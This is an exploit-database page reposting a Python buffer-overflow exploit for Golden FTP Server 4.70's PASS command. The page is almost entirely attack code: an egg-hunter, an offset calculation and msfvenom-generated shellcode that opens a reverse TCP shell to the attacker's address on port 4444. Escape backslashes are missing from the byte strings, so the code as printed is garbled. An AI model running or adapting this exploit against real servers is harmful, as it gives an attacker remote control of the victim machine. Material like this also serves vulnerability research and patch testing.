Golden FTP Server 4.70 – ‘PASS’ Buffer Overflow (2) – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 9th, 2021 📆 | 2477 Views ⚑

0

Golden FTP Server 4.70 – ‘PASS’ Buffer Overflow (2)

# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source ip address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in anyway, so be careful.
#
#!/usr/local/bin/python3

from socket import *
import sys

# Your address forms part of the buffer length calculation
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))

# msfvenom -p windows/shell_reverse_tcp -f python -b 'x00x0ax0d' LHOST=192.168.1.1 LPORT=4444
buf =  b""
buf += b"xbax1exb6xaax95xdaxc3xd9x74x24xf4x5dx29"
buf += b"xc9xb1x52x83xc5x04x31x55x0ex03x4bxb8x48"
buf += b"x60x8fx2cx0ex8bx6fxadx6fx05x8ax9cxafx71"
buf += b"xdfx8fx1fxf1x8dx23xebx57x25xb7x99x7fx4a"
buf += b"x70x17xa6x65x81x04x9axe4x01x57xcfxc6x38"
buf += b"x98x02x07x7cxc5xefx55xd5x81x42x49x52xdf"
buf += b"x5exe2x28xf1xe6x17xf8xf0xc7x86x72xabxc7"
buf += b"x29x56xc7x41x31xbbxe2x18xcax0fx98x9ax1a"
buf += b"x5ex61x30x63x6ex90x48xa4x49x4bx3fxdcxa9"
buf += b"xf6x38x1bxd3x2cxccxbfx73xa6x76x1bx85x6b"
buf += b"xe0xe8x89xc0x66xb6x8dxd7xabxcdxaax5cx4a"
buf += b"x01x3bx26x69x85x67xfcx10x9cxcdx53x2cxfe"
buf += b"xadx0cx88x75x43x58xa1xd4x0cxadx88xe6xcc"
buf += b"xb9x9bx95xfex66x30x31xb3xefx9exc6xb4xc5"
buf += b"x67x58x4bxe6x97x71x88xb2xc7xe9x39xbbx83"
buf += b"xe9xc6x6ex03xb9x68xc1xe4x69xc9xb1x8cx63"
buf += b"xc6xeexadx8cx0cx87x44x77xc7x68x30x76x16"
buf += b"x01x43x78x09x8dxcax9ex43x3dx9bx09xfcxa4"
buf += b"x86xc1x9dx29x1dxacx9exa2x92x51x50x43xde"
buf += b"x41x05xa3x95x3bx80xbcx03x53x4ex2exc8xa3"
buf += b"x19x53x47xf4x4exa5x9ex90x62x9cx08x86x7e"
buf += b"x78x72x02xa5xb9x7dx8bx28x85x59x9bxf4x06"
buf += b"xe6xcfxa8x50xb0xb9x0ex0bx72x13xd9xe0xdc"
buf += b"xf3x9cxcaxdex85xa0x06xa9x69x10xffxecx96"
buf += b"x9dx97xf8xefxc3x07x06x3ax40x37x4dx66xe1"
buf += b"xd0x08xf3xb3xbcxaax2exf7xb8x28xdax88x3e"
buf += b"x30xafx8dx7bxf6x5cxfcx14x93x62x53x14xb6"

total_length = 545-len(SOURCE)
eip = b'x7fx79x4cx00'
hunter =  b'x90x90x90x90x90x90' # padding              ; nop slide to account for variable offset base on source ip
hunter += b'xfd'                     # std                  ; set df flag so we search high to low
hunter += b'xb8x43x42x41x40'     # mov eax, 0x40414243  ; egg
hunter += b'x89xF7'                 # mov edi, esi         ; start searching from esi
hunter += b'x47'                     # inc edi
hunter += b'x90'                     # nop
hunter += b'x83xC7x03'             # add edi, 0x3         ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'xaf'                     # scasd                ; check for egg at edi
hunter += b'x75xfa'                 # short jnz -0x6       ; jump back to add edi, 0x3
hunter += b'x83xC7x03'             # add edi, 0x3
hunter += b'xaf'                     # scasd
hunter += b'x75xfa'                 # short jnz -0x6
hunter += b'x83xC7x1f'             # add edi, 0x1f        ; account for egg hunter
hunter += b'xffxe7'                 # jmp edi              ; egg found, let's go!
hunter += b'x90x90x90x90x90x90' # padding              ; nop slide to account for variable offset again

payload = hunter + buf + b'x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip

s.send(b'USER anonymousrn')
print(s.recv(1024))
print(s.recv(1024))
s.send(b'PASS ' + payload + b'rn')
print(s.recv(1024))
s.send(b'QUITrn')
print(s.recv(1024))
            

Source link

Tagged with:



Leave a Reply